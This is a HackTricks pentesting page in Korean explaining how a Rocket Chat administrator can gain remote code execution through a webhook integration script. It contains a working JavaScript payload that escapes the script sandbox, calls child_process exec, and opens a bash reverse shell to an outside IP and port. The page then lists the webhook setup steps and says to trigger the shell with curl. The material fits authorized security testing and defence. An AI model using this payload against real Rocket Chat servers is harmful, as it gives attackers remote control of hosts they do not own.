Rocket Chat

HackTricks 지원하기

RCE

로켓 챗에서 관리자인 경우 RCE를 얻을 수 있습니다.

  • **통합**으로 가서 **새 통합**을 선택하고 수신 웹후크 또는 발신 웹후크 중 하나를 선택합니다.

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • WebHook 구성 (채널과 사용자 이름으로 게시물이 존재해야 함):

  • WebHook 스크립트 구성:

  • 변경 사항 저장

  • 생성된 WebHook URL 가져오기:

  • curl로 호출하면 rev shell을 받을 수 있어야 함

HackTricks 지원하기

Last updated